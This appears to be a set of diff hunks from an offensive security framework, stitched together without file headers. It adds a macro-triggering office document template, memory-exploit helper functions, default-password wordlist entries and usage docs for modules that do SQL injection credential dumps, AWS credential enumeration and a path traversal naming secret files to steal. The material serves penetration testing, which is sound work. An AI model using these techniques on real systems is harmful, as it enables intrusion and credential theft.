+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -79,6 +79,18 @@ function Int64(v) {
        return '0x' + hexlify(Array.from(bytes).reverse());
    };

+    this.lo = function()
+    {
+        var b = this.bytes();
+        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+    };
+
+    this.hi = function()
+    {
+        var b = this.bytes();
+        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
+    };
+
    // Basic arithmetic.
    // These functions assign the result of the computation to their 'this' object.

@@ -46,6 +46,139 @@ function hexdump(data) {
    return lines.join('\n');
 }

+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function b2u32(b)
+{
+    return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+}
+
+
+
+function off2addr(segs, off)
+{
+    if(!(off instanceof Int64)) off = new Int64(off);
+    for(var i = 0; i < segs.length; ++i)
+    {
+        var start = segs[i].fileoff;
+        var end   = Add(start, segs[i].size);
+        if
+        (
+            (start.hi() < off.hi() || (start.hi() == off.hi() && start.lo() <= off.lo())) &&
+            (end.hi() > off.hi() || (end.hi() == off.hi() && end.lo() > off.lo()))
+        )
+        {
+            return Add(segs[i].addr, Sub(off, start));
+        }
+    }
+    return new Int64("0x4141414141414141");
+}
+
+function fsyms(mem, base, segs, want, syms)
+{
+    want = Array.from(want); // copy
+    if(syms === undefined)
+    {
+        syms = {};
+    }
+
+    var stab = null;
+    var ncmds = mem.u32(Add(base, 0x10));
+    for(var i = 0, off = 0x20; i < ncmds; ++i)
+    {
+        var cmd = mem.u32(Add(base, off));
+        if(cmd == 0x2) // LC_SYMTAB
+        {
+            var b = mem.read(Add(base, off + 0x8), 0x10);
+            stab =
+            {
+                symoff:  b2u32(b.slice(0x0, 0x4)),
+                nsyms:   b2u32(b.slice(0x4, 0x8)),
+                stroff:  b2u32(b.slice(0x8, 0xc)),
+                strsize: b2u32(b.slice(0xc, 0x10)),
+            };
+            break;
+        }
+        off += mem.u32(Add(base, off + 0x4));
+    }
+    if(stab == null)
+    {
+        fail("stab");
+    }
+    var tmp = { base: off2addr(segs, stab.stroff), off: 0 };
+    var fn = function(i)
+    {
+        return mem.read(Add(tmp.base, tmp.off + i), 1)[0];
+    };
+    for(var i = 0; i < stab.nsyms && want.length > 0; ++i)
+    {
+        tmp.off = mem.u32(off2addr(segs, stab.symoff + i * 0x10));
+        for(var j = 0; j < want.length; ++j)
+        {
+            var s = want[j];
+            if((strcmp(fn, s)))
+            {
+                syms[s] = mem.readInt64(off2addr(segs, stab.symoff + i * 0x10 + 0x8));
+                want.splice(j, 1);
+                break;
+            }
+        }
+    }
+    return syms;
+}
+
+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function _u32(i)
+{
+    return b2u32(this.read(i, 4));
+}
+
+function _read(i, l)
+{
+    if (i instanceof Int64) i = i.lo();
+    if (l instanceof Int64) l = l.lo();
+    if (i + l > this.length)
+    {
+        fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
+    }
+    return this.slice(i, i + l);
+}
+
+function _readInt64(addr)
+{
+    return new Int64(this.read(addr, 8));
+}
+
+function _writeInt64(i, val)
+{
+    if (i instanceof Int64) i = i.lo();
+    this.set(val.bytes(), i);
+}
+
+
 // Simplified version of the similarly named python module.
 var Struct = (function() {
    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
@@ -0,0 +1,15 @@
+#EXTM3U
+#EXT-X-VERSION:3
+#EXT-X-TARGETDURATION:4
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:3.433333,
+epicsax0.ts
+#EXTINF:1.700000,
+epicsax1.ts
+#EXTINF:1.700000,
+epicsax2.ts
+#EXTINF:1.700000,
+epicsax3.ts
+#EXTINF:1.466667,
+epicsax4.ts
+#EXT-X-ENDLIST
@@ -0,0 +1,4 @@
+244+0000009999
+188+030000
+19b+00000F
+19b+000010
@@ -4,3 +4,4 @@ root
 Administrator
 USERID
 guest
+Admin
@@ -405,6 +405,7 @@ root realtek
 root root
 root tini
 root tslinux
+root ubnt
 root user
 root vizxv
 root wyse
@@ -44,7 +44,7 @@ apc
 bintec
 blue
 c
-cable-d
+cable-docsis
 canon_admin
 cc
 cisco
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 20161227212223) do
+ActiveRecord::Schema.define(version: 20190507120211) do

  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
@@ -22,6 +22,17 @@ ActiveRecord::Schema.define(version: 20161227212223) do
    t.datetime "updated_at", null: false
  end

+  create_table "async_callbacks", force: :cascade do |t|
+    t.string   "uuid",           null: false
+    t.integer  "timestamp",      null: false
+    t.string   "listener_uri"
+    t.string   "target_host"
+    t.string   "target_port"
+    t.datetime "created_at",     null: false
+    t.datetime "updated_at",     null: false
+    t.uuid     "{:null=>false}"
+  end
+
  create_table "automatic_exploitation_match_results", force: :cascade do |t|
    t.integer  "match_id"
    t.integer  "run_id"
@@ -475,6 +486,23 @@ ActiveRecord::Schema.define(version: 20161227212223) do
  add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
  add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree

+  create_table "payloads", force: :cascade do |t|
+    t.string   "name"
+    t.string   "uuid"
+    t.integer  "uuid_mask"
+    t.integer  "timestamp"
+    t.string   "arch"
+    t.string   "platform"
+    t.string   "urls"
+    t.string   "description"
+    t.string   "raw_payload"
+    t.string   "raw_payload_hash"
+    t.string   "build_status"
+    t.string   "build_opts"
+    t.datetime "created_at",       null: false
+    t.datetime "updated_at",       null: false
+  end
+
  create_table "profiles", force: :cascade do |t|
    t.datetime "created_at",                null: false
    t.datetime "updated_at",                null: false
@@ -2,9 +2,11 @@ This module plays (by default) ["Epic sax guy 10 hours"](https://www.youtube.com

 Naturally, audio should be cranked to 11 before running this module.

+Only the deprecated DIAL protocol is supported by this module. Casting via the newer CASTV2 protocol is unsupported at this time.
+
 ## Verification Steps

-1. Do: ```use auxiliary/scanner/http/chromecast_webserver ```
+1. Do: ```use auxiliary/admin/chromecast/chromecast_youtube```
 2. Do: ```set RHOST [IP]```
 3. Do: ```run```

@@ -0,0 +1,35 @@
+## Summary
+
+This module exploits an unauthenticated remote file inclusion which exists in Supra Smart Cloud TV. 
+The media control for the device doesn't have any session management or authentication. Leveraging this, an
+attacker on the local network can send a crafted request to broadcast a fake video.
+
+**Reference:** https://www.inputzero.io/2019/06/hacking-smart-tv.html
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/supra_smart_cloud_tv_rfi `
+2. `set RHOSTS [IP]`
+3. `set SRVHOST [IP]`
+4. `run`
+
+Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.
+
+## Sample Output
+
+```
+msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132
+SRVHOST => 192.168.1.132
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155
+RHOSTS => 192.168.1.155
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
+[*] Running module against 192.168.1.155
+[*] Using URL: http://192.168.1.132:8080/
+[*] Broadcasting Epic Sax Guy to 192.168.1.155:80
+[+] Doo-doodoodoodoodoo-doo
+[*] Sleeping for 10s serving .m3u8 and .ts files...
+[*] Server stopped.
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) >
+```
@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module works against the Wordpress plugin `wp-google-maps` between 7.11.00 and 7.11.17 (included).
+
+[The vulnerable version is available on WordPress' plugin directory](https://downloads.wordpress.org/plugin/wp-google-maps.7.11.17.zip).
+
+## Verification Steps
+
+  1. `msfconsole`
+  2. `use auxiliary/admin/http/wp_google_maps_sqli`
+  3. `set RHOSTS <rhost>`
+  4. Set `DB_PREFIX` if necessary
+  5. `run`
+
+## Options
+
+### `DB_PREFIX` 
+
+Change the table prefix. By default, this option is set to `wp_`.
+
+## Scenarios
+
+### wp-google-maps 7.11.17 on WordPress 4.9.5
+
+```
+msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
+[*] Running module against 172.22.222.144
+
+[*] 172.22.222.144:80 - Trying to retrieve the wp_users table...
+[+] Credentials saved in: /home/msfdev/.msf4/loot/20190415065921_default_172.22.222.144_wp_google_maps.j_022930.bin
+[+] 172.22.222.144:80 - Found msfdev <hash> <email>
+[*] Auxiliary module execution completed
+```
@@ -29,6 +29,11 @@
   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
   Default is `~/.msf4/john.pot`.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
 ## Scenarios

 In this scenario, we fill a bunch of different hash types into the creds db.  You'll need a
@@ -28,6 +28,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -36,6 +36,11 @@

   Include `blowfish` and `SHA`(256/512) passwords.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **CUSTOM_WORDLIST**

   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
@@ -30,6 +30,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -29,6 +29,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -37,6 +37,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -32,6 +32,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -29,6 +29,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+This module is able to extract a zip file sent through Modbus from a pcap.
+
+Tested with Schneider TM221CE16R
+
+## Verification Steps
+
+1. Do: `use auxiliary/analyze/modbus_zip`
+2. Do: `set PCAPFILE <PATH_TO_PCAP>` where PATH_TO_PCAP is the PATH to the pcap file
+3. Do: `exploit` extract the zip file
+
+## Options
+
+**MODE**
+
+Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.
+
+## Scenarios
+
+ ```
+msf > use auxiliary/analyze/modbus_zip
+msf auxiliary(analyze/modbus_zip) > set PCAPFILE file.pcap
+PCAPFILE => file.pcap
+auxiliary(analyze/modbus_zip) > set MODE DOWNLOAD
+MODE => DOWNLOAD
+msf auxiliary(analyze/modbus_zip) > exploit
+[*] Running module against 0.0.0.0
+
+[*] Zip start on packet 1370
+[*] Zip end on packet 1452
+[*] Done!
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,117 @@
+## Vulnerable Application
+
+Amazon Web Services (AWS) resources can be managed through an API that authenticates based on an `ACCESS_KEY_ID` and a `SECRET_ACCESS_KEY`.  With these two pieces of information, an attacker can gain privileges which may include enumerating resources within the AWS account.
+
+This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute instances that the credentials can see.  The instances themselves may be connected to the public Internet, but are likely to be protected by security groups and subnet network ACLs.  In any case, knowledge of the instances is the first step in evaluating their security.
+
+## Verification Steps
+
+### Create or acquire the credentials
+
+  1. (If necessary) Create an AWS account.  Free trials are available.
+  2. Login to the [AWS Console](https:\\console.aws.amazon.com\).
+  3. Use the dropbown menu in the top-right with your username, then click on "My Security Credentials".
+  4. Expand the "Access Keys" pane and click  "Create New Access Key".
+  5. Follow the steps in the AWS console, making sure to record both the 'access key ID' and 'secret access key'.  (The 'secret access key' is only shown once, then can never be retrieved.)
+
+### Enumerate AWS resources using the credentials
+
+  1. Start msfconsole
+  2. `use auxiliary/cloud/aws/enum_ec2`
+  3. Set the `ACCESS_KEY_ID` and `SECRET_ACCESS_KEY` options.
+  4. Optionally, set the `REGION` and `LIMIT` options.
+  5. `run`
+
+## Options
+
+  **ACCESS_KEY_ID**
+
+  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
+  
+  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
+
+  **SECRET_ACCESS_KEY**
+
+  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
+  
+  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.
+
+## Scenarios
+
+### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges 
+
+```
+msf5 auxiliary(cloud/aws/enum_iam) > run
+
+[+] Found 3 users.
+[+]   User Name:       test1
+[+]   User ID:         AIDA5C76TR3KTTO3PTAJ7
+[+]   Creation Date:   2019-06-14 18:18:23 UTC
+[+]   Tags:            []
+[+]   Groups:          []
+[+]   SSH Pub Keys:    []
+[+]   Policies:        IAMUserChangePassword
+[+]   Signing certs:   []
+[+]   Password Used:   2019-06-17 19:55:57 UTC
+[+]   AWS Access Keys: AKIA5C76TR3K3JN3FYUE (Active)
+[+]   Console login:   Enabled
+[+]   Two-factor auth: Enabled on 2019-06-17 20:01:05 UTC
+[*] 
+[+]   User Name:       test2
+[+]   User ID:         AIDA5C76TR3KVHWFEQSDL
+[+]   Creation Date:   2019-06-14 18:18:35 UTC
+[+]   Tags:            []
+[+]   Groups:          ["mygroup", "mygroup2"]
+[+]   SSH Pub Keys:    []
+[+]   Policies:        IAMUserChangePassword
+[+]   Signing certs:   []
+[+]   Password Used:   (Never)
+[+]   AWS Access Keys: AKIA5C76TR3KXHXA5CRC (Inactive)
+[+]   Console login:   Enabled
+[+]   Two-factor auth: Disabled
+[*] 
+[+]   User Name:       test3
+[+]   User ID:         AIDA5C76TR3KYI2HC4MOL
+[+]   Creation Date:   2019-06-14 18:18:44 UTC
+[+]   Tags:            []
+[+]   Groups:          ["mygroup"]
+[+]   SSH Pub Keys:    []
+[+]   Policies:        []
+[+]   Signing certs:   []
+[+]   Password Used:   (Never)
+[+]   AWS Access Keys: AKIA5C76TR3KWWADYZNB (Active)
+[+]   Console login:   Disabled
+[+]   Two-factor auth: Disabled
+[*] 
+[*] Auxiliary module execution completed
+```
+  
+### Provided an invalid or inactive 'access key ID'
+
+```
+msf5 auxiliary(cloud/aws/enum_iam) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: The security token included in the request is invalid.
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud/aws/enum_iam) >
+```
+  
+### Provided an invalid 'secret access key'
+
+```
+msf5 auxiliary(cloud/aws/enum_iam) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your AWS Secret Access Key and signing method. Consult the service documentation for details.
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud/aws/enum_iam) > 
+```
+
+### Provided an 'access key ID' or 'secret access key' with insufficient privileges
+
+```
+msf5 auxiliary(cloud\aws\enum_ec2) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: User: arn:aws:iam::899712345657:user/test1 is not authorized to perform: iam:ListUsers on resource: arn:aws:iam::899712345657:user/
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud\aws\enum_ec2) > 
+```
@@ -0,0 +1,102 @@
+## Vulnerable Application
+
+Amazon Web Services (AWS) resources can be managed through an API that authenticates based on an `ACCESS_KEY_ID` and a `SECRET_ACCESS_KEY`.  With these two pieces of information, an attacker can gain privileges which may include enumerating resources within the AWS account.
+
+This module authenticates to AWS IAM (Identify Access Module) to identify user accounts that the credentials can see.  The users themselves are likely protected with different credentials, including passwords or MFA tokens.  In any case, knowledge of the users is the first step in evaluating their security.
+
+## Verification Steps
+
+### Create or acquire the credentials
+
+  1. (If necessary) Create an AWS account.  Free trials are available.
+  2. Login to the [AWS Console](https:\\console.aws.amazon.com\).
+  3. Use the dropbown menu in the top-right with your username, then click on "My Security Credentials".
+  4. Expand the "Access Keys" pane and click  "Create New Access Key".
+  5. Follow the steps in the AWS console, making sure to record both the 'access key ID' and 'secret access key'.  (The 'secret access key' is only shown once, then can never be retrieved.)
+
+### Enumerate AWS resources using the credentials
+
+  1. Start msfconsole
+  2. `use auxiliary/cloud/aws/enum_iam`
+  3. Set the `ACCESS_KEY_ID` and `SECRET_ACCESS_KEY` options.
+  4. `run`
+
+## Options
+
+  **ACCESS_KEY_ID**
+
+  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
+  
+  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
+
+  **SECRET_ACCESS_KEY**
+
+  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
+  
+  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.
+
+  **REGION**
+
+  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
+  
+  An example region would be `us-west-2`.
+
+  **LIMIT**
+
+  Some AWS API calls support limiting output, such that the module will only reutrn the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
+  
+  Note that the `LIMIT` parameter is imposed per region, so the total number of results may be higher than the user-specified limit, but the maximum number of results for a single region will not exceed `LIMIT`.  This behavior is due to the AWS API.
+  
+  An example `LIMIT` would be `10`.
+
+## Scenarios
+
+### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges 
+
+```
+msf5 auxiliary(cloud/aws/enum_ec2) > run
+
+[*] Found 0 instances in eu-north-1
+[*] Found 0 instances in ap-south-1
+[*] Found 0 instances in eu-west-3
+[*] Found 0 instances in eu-west-2
+[*] Found 0 instances in eu-west-1
+[*] Found 0 instances in ap-northeast-2
+[*] Found 0 instances in ap-northeast-1
+[*] Found 0 instances in sa-east-1
+[*] Found 0 instances in ca-central-1
+[*] Found 0 instances in ap-southeast-1
+[*] Found 0 instances in ap-southeast-2
+[*] Found 0 instances in eu-central-1
+[*] Found 0 instances in us-east-1
+[*] Found 0 instances in us-east-2
+[*] Found 0 instances in us-west-1
+[*] Found 1 instances in us-west-2
+[+]   i-0f8bb3bbb06faf58d (running)
+[+]     Creation Date:  2019-06-11 23:14:48 UTC
+[+]     Public IP:      18.236.87.255 (ec2-18-236-87-255.us-west-2.compute.amazonaws.com)
+[+]     Private IP:     18.236.87.255 (ip-172-31-30-21.us-west-2.compute.internal)
+[+]     Security Group: sg-0d52cc35aaf82aff5
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud/aws/enum_ec2) > 
+```
+  
+### Provided an invalid or inactive 'access key ID', or an invalid 'secret access key'
+
+```
+msf5 auxiliary(cloud\aws\enum_ec2) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: AWS was not able to validate the provided access credentials
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud\aws\enum_ec2) > 
+```
+
+### Provided an 'access key ID' or 'secret access key' with insufficient privileges
+
+```
+msf5 auxiliary(cloud\aws\enum_ec2) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: You are not authorized to perform this operation.
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud\aws\enum_ec2) > 
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+Amazon Web Services (AWS) resources can be managed through an API that authenticates based on an `ACCESS_KEY_ID` and a `SECRET_ACCESS_KEY`.  With these two pieces of information, an attacker can gain privileges which may include enumerating resources within the AWS account.
+
+This module authenticates to AWS S3 (Simple Storage Service), to identify buckets that the credentials can see.  The files contained within buckets may be publicly readable and/or writable, or they may be locked down.  In any case, knowledge of the buckets is the first step in evaluating their security.
+
+## Verification Steps
+
+### Create or acquire the credentials
+
+  1. (If necessary) Create an AWS account.  Free trials are available.
+  2. Login to the [AWS Console](https://console.aws.amazon.com/).
+  3. Use the dropbown menu in the top-right with your username, then click on "My Security Credentials".
+  4. Expand the "Access Keys" pane and click  "Create New Access Key".
+  5. Follow the steps in the AWS console, making sure to record both the 'access key ID' and 'secret access key'.  (The 'secret access key' is only shown once, then can never be retrieved.)
+
+### Enumerate AWS resources using the credentials
+
+  1. Start msfconsole
+  2. `use auxiliary/cloud/aws/enum_s3`
+  3. Set the `ACCESS_KEY_ID` and `SECRET_ACCESS_KEY` options.
+  4. Optionally, set the `REGION` option.
+  5. `run`
+
+## Options
+
+  **ACCESS_KEY_ID**
+
+  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
+  
+  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
+
+  **SECRET_ACCESS_KEY**
+
+  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
+  
+  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF/2dq3SbDsQj4jdyOMOv`.
+
+  **REGION**
+
+  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
+  
+  An example region would be `us-west-2`.
+
+## Scenarios
+
+### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges 
+
+```
+msf5 auxiliary(cloud/aws/enum_s3) > run
+[+] Found 1 buckets.
+[+]   Name:           asoto-secret-demo-bucket
+[+]   Creation Date:  2019-06-13 23:30:26 UTC
+[+]   # of Objects:   0
+[+]   Region:         us-west-2
+[+]   Website:        /index.html
+[+]   Owner:          asoto
+[+]   Permissions:
+[+]                   User 'asoto' granted FULL_CONTROL
+[+]                   Group '' (http://acs.amazonaws.com/groups/s3/LogDelivery) granted READ
+[*] 
+[*] Done.
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud/aws/enum_s3) > exit
+```
+  
+### Provided an invalid or inactive 'access key ID'
+
+```
+msf5 auxiliary(cloud/aws/enum_s3) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: The AWS Access Key Id you provided does not exist in our records.
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud/aws/enum_s3) >
+```
+  
+### Provided an invalid 'secret access key'
+
+```
+msf5 auxiliary(cloud/aws/enum_s3) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your key and signing method.
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud/aws/enum_s3) > 
+```
+
+### Provided an 'access key ID' or 'secret access key' with insufficient privileges
+
+```
+msf5 auxiliary(cloud/aws/enum_s3) > run
+
+[-] Auxiliary aborted due to failure: unexpected-reply: Access Denied
+[*] Auxiliary module execution completed
+msf5 auxiliary(cloud/aws/enum_s3) > 
+```
@@ -0,0 +1,66 @@
+## Description
+
+This module performs unauthenticated requests to retrieve masthead, sites, and packages information from IBM BigFix Relay Servers. If the **DOWNLOAD** option is set then the module will attempt to download the identified packages. This module has been tested against Relay Server 9.5.10.79.
+
+## Vulnerable Application
+
+BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11
+
+## Options
+
+**SHOW_MASTHEAD**
+
+Default: true. Read Organization name from `/masthead/masthead.axfm`
+
+**SHOW_PACKAGES**
+
+Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`
+
+**SHOW_SITES**
+
+Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`
+
+**DOWNLOAD**
+
+Default true. Attempt to download identified packages.
+
+**ShowURL**
+
+Default false. Show full URL for the packages instead of the filename.
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use auxiliary/gather/ibm_bigfix_sites_packages_enum`
+3. `set rhosts <rhost>`
+4. `exploit`
+
+## Scenarios
+
+### Relay Version 9.5.10.79
+
+```
+msf5 > use auxiliary/gather/ibm_bigfix_sites_packages_enum
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts <rhost>
+rhosts => <rhost>
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit
+[*] Running module against [IP]
+
+[+] [Organization]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/actionsite
+[+] http://[hostname]:52311/cgi-bin/bfenterprise/PostResults.exe
+<snip>
+[*] Sites
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+<snip>
+[*] Packages
+[*] Action: [action number]
+[+] File: [package name]
+[*] Action: [action number]
+[+] File: [package name]
+<snip>
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) >
+```
@@ -0,0 +1,79 @@
+## Description
+
+Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.
+
+In the Load Testing component, a vulnerability was discovered by Steven Seeley (@mr_me) of Source Incite in the DownloadServlet class. According to the Source Incite advisory, the issue results from the lack of proper validation of a user-supplied string before using it to read a file. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Note that authentication is required.
+
+This vulnerability is also known as CVE-2019-2557.
+
+
+## Vulnerable Application
+
+The following is the exact setup I used to test and analyze the vulnerability:
+
+- Windows Server 2008 R2 x64 (other Windows systems are also supported)
+  - .Net Framework 3.5 enabled (from add/remove features)
+  - IE ESC (from Server Manager) disabled
+  - 8GB of RAM (at least more than 4GB will be used to run OATS)
+  - Duel-Core processor
+- oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
+- Jdk-7u21-windows-x64.exe
+- OracleXE112_Win64.zip (Newer version 18c did not work well for me)
+- Firefox (I had to install this because IE on Win2k8 is completely outdated)
+- Adobe Flash installed (IE ESC needs to be disabled in order to install this)
+
+For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.
+
+## Notes
+
+By default, your starting traversal path is:
+
+```
+C:\OracleATS\config\Report Templates\
+```
+
+There are some interesting files you can steal from this directory, such as:
+
+* oats-config.xml
+* oats-database-config.xml
+* oats-keystore
+
+Code execution is possible leveraging from this vulnerability if you target these files:
+
+* C:\OracleATS\oats\servers\AdminServer\security\SerializedSystemIni.dat
+* C:\OracleATS\oats\servers\AdminServer\security\boot.properties
+
+After that, you can find a third party script to decrypt the credentials, and then you could
+gain code execution from the administrator console.
+
+
+## Credit
+
